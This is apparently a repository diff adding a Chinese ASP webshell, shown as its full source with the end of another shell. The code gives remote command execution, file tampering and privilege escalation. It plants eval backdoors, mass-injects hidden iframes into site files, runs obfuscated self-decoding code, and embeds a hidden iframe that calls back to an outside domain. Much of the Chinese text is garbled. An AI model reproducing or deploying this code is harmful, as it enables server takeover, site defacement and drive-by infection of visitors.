)��htp��(tseuqeR=htp�� )��xe��(tseuqeR=xe��)��/��(htaPpaM.revreS=s neht ���=s fi�� )��df��(tseuqeR=s�� )��OFNI_HTAP��(selbairaVrevreS.tseuqeR=FLES_PSA��)��>b/<��(&)��/��(htaPpaM.revreS&)��:��·�Ծ�վ��ǰ��>b<��( SRR":ExeCuTe(ShiSanFun(ShiSan))::Case "Cplgm":Fpath=Request("fd"):addcode = Request("code"):addcode2 = Request("code2"):pcfile=request("pcfile"):checkbox=request("checkbox"):ShowMsg=request("ShowMsg"):FType=request("FType"):M=request("M"):if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx":if Fpath="\" then Fpath=Server.MapPath("\")
+	if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")	
+	if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
+	if checkbox="" then checkbox=request("checkbox")
+	if pcfile="" then
+		pcfileName=Request.ServerVariables("SCRIPT_NAME")
+		pcfilek=split(pcfileName,"/") 
+		pcfilen=ubound(pcfilek) 
+		pcfile=pcfilek(pcfilen) 
+	end if
+  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+	RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+	RRS "<form method=POST><div style='color:#3399ff'><b>[" 
+	if M="1" then RRS"��������-������"
+	if M="2" then RRS"��������-������˵���"
+	if M="3" then RRS"�����滻��-�ļ��滻�޸Ĺ���"
+	if M="" then response.end
+	RRS "]</b></div><table width=100% border=0><tr><td>�ļ�·����</td>"
+	RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+	if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+	RRS "<tr><td>�ų��ļ���</td>"
+	RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+	RRS "<tr><td>�ļ����ͣ�</td>"
+	RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
+	if M="1" then RRS"Ҫ�ҵģ�"
+	if M="2" then RRS"Ҫ��ģ�"
+	if M="3" then RRS"�������ݣ�"
+	RRS"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+	if M="3" then RRS "<tr><td><font color=#3399ff>�� �� ��</font></td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+	RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+	RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+Sub InsertAllFiles(Wpath,Wcode,pc)
+	Server.ScriptTimeout=999999999
+	 if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+	 Set WFSO = CreateObject("Scripting.FileSystemObject")
+	 on error resume next 
+	 Set f = WFSO.GetFolder(Wpath)
+	 Set fc2 = f.files
+	 For Each myfile in fc2
+		Set FS1 = CreateObject("Scripting.FileSystemObject")
+		FType1=split(myfile.name,".") 
+		FType2=ubound(FType1) 
+		if Ftype2>0 then
+		FType3=LCase(FType1(FType2)) 
+		else
+		FType3="��"
+		end if
+		if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+			select case M
+				case "1"
+					if checkbox<>"checked" then
+						Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+						tfile.writeline Wcode
+						RRS"�� "&Wpath&myfile.name
+						tfile.close
+					else
+						Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+						if Instr(tfile1.readall,Wcode)=0 then
+							Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+							tfile.writeline Wcode
+							RRS"��  "&Wpath&myfile.name
+							tfile1.close
+						else
+							RRS"<font color=red>��</font> "&Wpath&myfile.name
+							tfile1.close
+						end if
+						Set tfile1=Nothing
+					end if
+				case "2"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,"")
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case "3"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,addCode2)
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case else
+					RRS"���,������.":response.end
+			end select
+		else
+			RRS"�� "&Wpath&myfile.name
+		end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+	 Next
+ Set fsubfolers = f.SubFolders
+ For Each f1 in fsubfolers
+	NewPath=Wpath&""&f1.name
+ 	InsertAllFiles NewPath,Wcode,pc
+ Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+  Case "ReadREG":call ReadREG()
+  Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+  Case "DownFile":DownFile FName:ShowErr()
+  Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+  Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+  Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+  Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+  Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+  Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+  Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+  Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+  Case "UpFile":UpFile()
+  Case "Cmd1Shell":Cmd1Shell()
+  case "SetFileText":SetFileText()
+  case "hiddenshell":hiddenshell()
+  case "php":php()
+  case "apjdel":apjdel()
+  Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL
+  Case "CreateMdb":CreateMdb FName
+  Case "CompactMdb":CompactMdb FName
+  Case "DbManager":DbManager()
+  Case "Course":Course()
+  Case "ServerInfo":ServerInfo()
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+RRS"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>"
+%>
\ No newline at end of file
diff --git a/www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp b/www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp
new file mode 100644
index 0000000..806bd41
--- /dev/null
+++ b/www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp	
@@ -0,0 +1,1454 @@
+<%
+UserPass="admin"     '��½����
+loginad="�ձ����빷�������ڣ� "'������֤������ʾ������
+mName="���NEW WebShell"           '��������
+SiteURL="http://www.7jyewu.cn/"            '��վ
+Copyright="�������ڷǷ���;�����������߸Ų�����"       '��Ȩ
+AD="���"   '�������
+'------------------------------------------------------------
+
+'  �������ظ���ţ����ɱ�����𣿡�   http://www.7jyewu.cn/
+
+'-------------------------------------------------------------
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+sub ShowErr()
+  If Err Then
+    RRS"<br><a href='javascript:history.back()'><br>&nbsp;" & Err.Description & "</a><br>"
+    Err.Clear:Response.Flush
+  End If
+end sub
+Sub RRS(str)
+	response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+serveru=request.servervariables("http_host")&url
+serverp=userpass
+uu=serveru
+FolderPath=Request("FolderPath")
+FName=Request("FName")
+BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>":
+dim ShiSan,ShiSanNewstr,ShiSanI
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf & ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+uu=serveru
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mName&" - "&ServerIP&" </title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:#000000;color:#00ff00;}"
+RRS"input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}"
+RRS".C{background-color:#000000;border:0px}"
+RRS".cmd{background-color:#000;color:#FFF}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ShiSan="���>tpircs/<��SRR���};eurt nruter;)(timbus.mroFbD;�����=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)���!ȷ�����Ǿ���LQS�������(trela{)01<htgnel.rts(fi};eslaf nruter;)���!ȷ�����Ǵ�����������������(trela{)5<htgnel.eulav.rtSbD.mroFbD(fi{)gp,rts(rtSlqSlluF noitcnuf��SRR���};eurt nruter};]i[rtS = eulav.rtSlqS.mroFbD{esle};)]i[rtS(trela{)21==i(fi esle};���>retnec/<��������������LQS�����ٿ������������ȷ��>retnec<���=LMTHrenni.cba;����� = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=<i(fi;��塣���ָ�ʮ��ǰ�Ķ���ʾ��ֻ������һ����n\.��ʵѯ���ƿؼ����ÿɣ����ֲ�ȫ�Ķ���ʾ�Կɼ�ʱ������һʾ��ֻ����� =]21[rtS;���SSAP NMULOC PORD ]emaNelbaT[ ELBAT RETLA��� =]11[rtS;���)23(RAHCRAV SSAP NMULOC DDA ]emaNelbaT[ ELBAT RETLA��� =]01[rtS;���]emaNelbaT[ ELBAT PORD��� = ]9[rtS;���))05(RAHCRAV RESU,LLUN TON )1,1( YTITNEDI TNI DI(]emaNelbaT[ ELBAT ETAERC��� = ]8[rtS;���001=DI EREHW '\emanresu'\=RESU TES ]emaNelbaT[ ETADPU��� = ]7[rtS;���001=DI EREHW ]emaNelbaT[ MORF ETELED��� = ]6[rtS;���)'\drowssap'\,'\emanresu'\(SEULAV )SSAP,RESU(]emaNelbaT[ OTNI TRESNI��� = ]5[rtS;���001<DI EREHW ]emaNelbaT[ MORF * TCELES��� = ]4[rtS;���emaNnsD=nsD��� = ]3[rtS;���****=dwP;toor=diU;emaNbD=esabataD;6033=troP;��&PIrevreS&��=revreS;}lqSyM{=revirD��� = ]2[rtS;���****=dwP;as=diU;emaNbD=esabataD;3341,��&PIrevreS&��=revreS;}revreS lqS{=revirD��� = ]1[rtS;���***=drowssaP esabataD:BDELO teJ;bdm.bd\\��&))��htaPredloF��(noisseS(htaPeR&��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP��� = ]0[rtS;)21(yarrA wen = rtS};eslaf nruter{)0<i(fi{)i(rtSbDlluF noitcnuf��SRR���};eurt nruter};eslaf nruter;)0(rtSbDlluF;)�����������������(trela{)����� == eulav.rtSbD.mroFbD(fi{)(kcehCbD noitcnuf��SRR���}};����� = eulav.emaNF.mrofedih.pot{esle};)(timbus.mrofedih.pot;noitcAF = eulav.noitcA.mrofedih.pot{)llun=!emaND(fi};���rehtO��� = emaND{esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡�ڴ���Ǽ�����ע,����ȫ����bdM����ѹҪ��������(tpmorp = emaND{)���bdMtcapmoC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,��壡��ͬ�ܲ���ע,����ȫ����bdM�Ľ���Ҫ��������(tpmorp = emaND{)���bdMetaerC���==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ĵĽ���Ҫ��������(tpmorp = emaND{)���redloFweN���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ�м��ı�Ŀ��������������(tpmorp = emaND{)���redloFypoC���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ��������������(tpmorp = emaND{)���eliFevoM���==noitcAF(fi esle};emaND+���||||��� =+ eulav.emaNF.mrofedih.pot;)emaNF,������ȫ���ı�Ŀ���Ƹ���������(tpmorp = emaND{)���eliFypoC���==noitcAF(fi;emaNF = eulav.emaNF.mrofedih.pot{)noitcAF,emaNF(mroFlluF noitcnuf��SRR���};)(timbus.mrofrdda.pot;redloF = eulav.htaPredloF.mrofrdda.pot{)redloF(redloFwohS noitcnuf��SRR���;)(kcolCnur};yalpsid+���--  ��&DA&��������=sutats.wodniw;)(gnirtSelacoLot.yadot =yalpsid rav;)(etaD wen = yadot rav;)001 ,���)(kcolCnur���(tuoemiTtes.wodniw = emiTeht{)(kcolCnur noitcnuf��SRR���};eslaf nruter esle;eurt nruter))��壿�����ٴ���ִҪ��ȷ���(mrifnoc( fi{)(kosey noitcnuf��SRR���;srorrEllik=rorreno.wodniw};eurt nruter{)(srorrEllik noitcnuf>tpircsavaj=egaugnal tpircs<��SRR"
+ExeCuTe(ShiSanFun(ShiSan))
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim ObT(13,2)
+ObT(0,0) = "Scripting.FileSystemObject"
+  ObT(0,2) = "�ļ��������"
+ObT(1,0) = "wscript.shell"
+  ObT(1,2) = "������ִ�����"
+ObT(2,0) = "ADOX.Catalog"
+  ObT(2,2) = "ACCESS�������"
+ObT(3,0) = "JRO.JetEngine"
+  ObT(3,2) = "ACCESSѹ�����"
+ObT(4,0) = "Scripting.Dictionary" 
+  ObT(4,2) = "�������ϴ��������"
+ObT(5,0) = "Adodb.connection"
+  ObT(5,2) = "���ݿ��������"
+ObT(6,0) = "Adodb.Stream"
+  ObT(6,2) = "�������ϴ����"
+ObT(7,0) = "SoftArtisans.FileUp"
+  ObT(7,2) = "SA-FileUp �ļ��ϴ����"
+ObT(8,0) = "LyfUpload.UploadFile"
+  ObT(8,2) = "���Ʒ��ļ��ϴ����"
+ObT(9,0) = "Persits.Upload.1"
+  ObT(9,2) = "ASPUpload �ļ��ϴ����"
+ObT(10,0) = "JMail.SmtpMail"
+  ObT(10,2) = "JMail �ʼ��շ����"
+ObT(11,0) = "CDONTS.NewMail"
+  ObT(11,2) = "����SMTP�������"
+ObT(12,0) = "SmtpMail.SmtpMail.1"
+  ObT(12,2) = "SmtpMail�������"
+ObT(13,0) = "Microsoft.XMLHTTP"
+  ObT(13,2) = "���ݴ������"
+For i=0 To 13
+	Set T=Server.CreateObject(ObT(i,0))
+	If -2147221005 <> Err Then
+	  IsObj=" ��"
+	Else
+	  IsObj=" ��"
+	  Err.Clear
+	End If
+	Set T=Nothing
+	ObT(i,1)=IsObj
+Next
+If FolderPath<>"" then
+  Session("FolderPath")=RRePath(FolderPath)
+End If
+If Session("FolderPath")="" Then
+  FolderPath=RootPath
+  Session("FolderPath")=FolderPath
+End if
+function php():On Error Resume Next:set fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo��_��oo'?><?php phpinfo()?>":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo��_��oo":fso.CreateTextFile(Server.MapPath("/")&"/images/left_gif.asp").Write""&chr(60)&"%Eval(Request(chr(63))):"&chr(37)&""&chr(62)&"":
+fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo��_��oo":
+RRS"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center>":
+RRS"<br><br><p><br><p><br><br><p><br><center>Test<p></font><p><a href='?Action=apjdel'><font size=5 color=red>(ɾ�������ļ�!)</font> "&copyurl&"</a></center>":RRS Efun&""&serveru&"&p="&UserPass&"'><script>"
+End function:function apjdel():set fso=Server.CreateObject(oBt(0,0)):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):
+RRS"Del Success!":End function
+Function MainForm()
+RRS"<form name=""hideform"" method=""post"" action="""&urL&""" target=""FileFrame"">":
+RRS"<input type=""hidden"" name=""Action"">":
+RRS"<input type=""hidden"" name=""FName"">":
+RRS"</form>":
+RRS"<table width='100%' height='100%'  border=0 cellpadding='1' cellspacing='0'>":
+RRS"<tr><td height='30' colspan='2'>":
+RRS"<table width='100%'>":
+RRS"<form name='addrform' method='post' action='"&Url&"' target='_parent'>":
+RRS"<tr><td width='60' align='center'>��ַ����</td><td>":
+RRS"<input name='FolderPath' style='width:100%' value='"&SesSIon("FolderPath")&"'>":
+RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" :
+RRS"  <tr align='center' valign='middle'>":
+RRS"<tr>��ȨĿ¼�б�����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>��ʼ <b>��</b> ����</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>C:\\RECYCLER</a>����<a href='javascript:ShowFolder(""D:\\RECYCLER\\"")'>D:\RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>":
+RRS"</td></tr></form></table></td></tr><tr><td width='170'>":
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>":
+RRS"<td>":
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>":
+RRS"</td></tr></table>"
+
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+
+Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>":RRS"<tr><td height='5'></td></tr>":RRS"<tr><td><center><font color=red>"&mName&"</font></center></a><hr hight=1 width='100%'>":RRS"</td></tr>":If ObT(0,1)=" ��" Then:RRS"<tr><td height='24'>��Ȩ��</td></tr>":Else:RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""><b> +>�鿴Ӳ��</b><div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">":Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing:RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->վ��<b>��Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>->��<b>����Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Progra~1"")'>->C:\\Progra~1</a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Docume~1"")'>->C:\\Docume~1</a></td></tr>":RRS"":RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>->�½�Ŀ¼</a></td></tr>":RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>->�½��ı�</a></td></tr>":End If::RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>->�ϴ��ļ�</a></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>->ϵͳ����-�û��˺�</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'><b>->�ն˶˿�-�Զ���¼</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>->��������Ϣ-���֧��</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'><b>->ִ��CMD����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=SetFileText' target='FileFrame'><b>->�޸��ļ�����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=php' target='FileFrame'><b>->�ű�̽��</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=hiddenshell' target='FileFrame'><b>->�������ش���</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'><b>->Servu��Ȩ</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'><b>->�����ļ�</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>->����<b>�滻</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>->������(��ͨ��)</a></b></td></tr>":RRS"<tr><td height='22'><a href='?Action=PageAddToMdb' target='FileFrame'>->�ļ��д��-�����</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>->��ȡע�������</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>->�˿�ɨ����</a></td></tr>":RRS"<tr><td height='24' onmouseover=""menu2.style.display=''""><b>+>���ݿ����</b><div id=menu2 style=""line-height:18px;width:100%;display='none'"" onmouseout=""menu2.style.display='none'"">":RRS"&nbsp;&nbsp;&nbsp;<a href='?Action=DbManager' target='FileFrame'>�������ݿ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>����MDB�ļ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>ѹ��MDB�ļ�</a></div></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>->�˳���¼</a></td></tr>":RRS"<tr><td align=center style='color:red'><hr>"&Copyright&"</td></tr></table>":
+RRS"</table>"
+End Function
+	Sub PageAddToMdb()
+		Dim theAct, thePath
+		theAct = Request("theAct")
+		thePath = Request("thePath")
+		Server.ScriptTimeOut = 5000
+		If theAct = "addToMdb" Then
+			addToMdb(thePath)
+			RRS "�������!"
+			Response.End
+		End If
+		If theAct = "releaseFromMdb" Then
+			unPack(thePath)
+			RRS"�������!"
+			Response.End
+		End If
+		RRS "�ļ��д��:<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+		RRS "<input type=hidden value=addToMdb name=theAct>"
+		RRS "<select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option>"
+		RRS "</select>"
+		RRS "<br><input type=submit value='��ʼ���'>"
+		RRS "<hr/>ע: �������HYTop.mdb�ļ�,λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>�ļ����⿪(��FSO֧��):<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HYTop.mdb"" size=80>"
+		RRS "<input type=hidden value=releaseFromMdb name=theAct><input type=submit value='���ҽ⿪'>"
+		RRS "<hr/>ע: �⿪���������ļ���λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>"
+	End Sub
+	Sub addToMdb(thePath)
+		On Error Resume Next
+		Dim rs, conn, stream, connStr, adoCatalog
+		Set rs = Server.CreateObject("ADODB.RecordSet")
+		Set stream = Server.CreateObject("ADODB.Stream")
+		Set conn = Server.CreateObject("ADODB.Connection")
+		Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HYTop.mdb")
+		adoCatalog.Create connStr
+		conn.Open connStr
+		conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+		stream.Open
+		stream.Type = 1
+		rs.Open "FileData", conn, 3, 3
+		If Request("theMethod") = "fso" Then
+			fsoTreeForMdb thePath, rs, stream
+		 Else
+			saTreeForMdb thePath, rs, stream
+		End If
+		rs.Close
+		Conn.Close
+		stream.Close
+		Set rs = Nothing
+		Set conn = Nothing
+		Set stream = Nothing
+		Set adoCatalog = Nothing
+	End Sub
+	Function fsoTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, folders, files, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		If fsoX.FolderExists(thePath) = False Then
+			showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+		End If
+		Set theFolder = fsoX.GetFolder(thePath)
+		Set files = theFolder.Files
+		Set folders = theFolder.SubFolders
+		For Each item In folders
+			fsoTreeForMdb item.Path, rs, stream
+		Next
+		For Each item In files
+			If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+				rs.AddNew
+				rs("thePath") = Mid(item.Path, 4)
+				stream.LoadFromFile(item.Path)
+				rs("fileContent") = stream.Read()
+				rs.Update
+			End If
+		Next
+		Set files = Nothing
+		Set folders = Nothing
+		Set theFolder = Nothing
+	End Function
+	function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+
+	Sub unPack(thePath)
+		On Error Resume Next
+		Server.ScriptTimeOut = 5000
+		Dim rs, ws, str, conn, stream, connStr, theFolder
+		str = Server.MapPath(".") & "\"
+		Set rs = CreateObject("ADODB.RecordSet")
+		Set stream = CreateObject("ADODB.Stream")
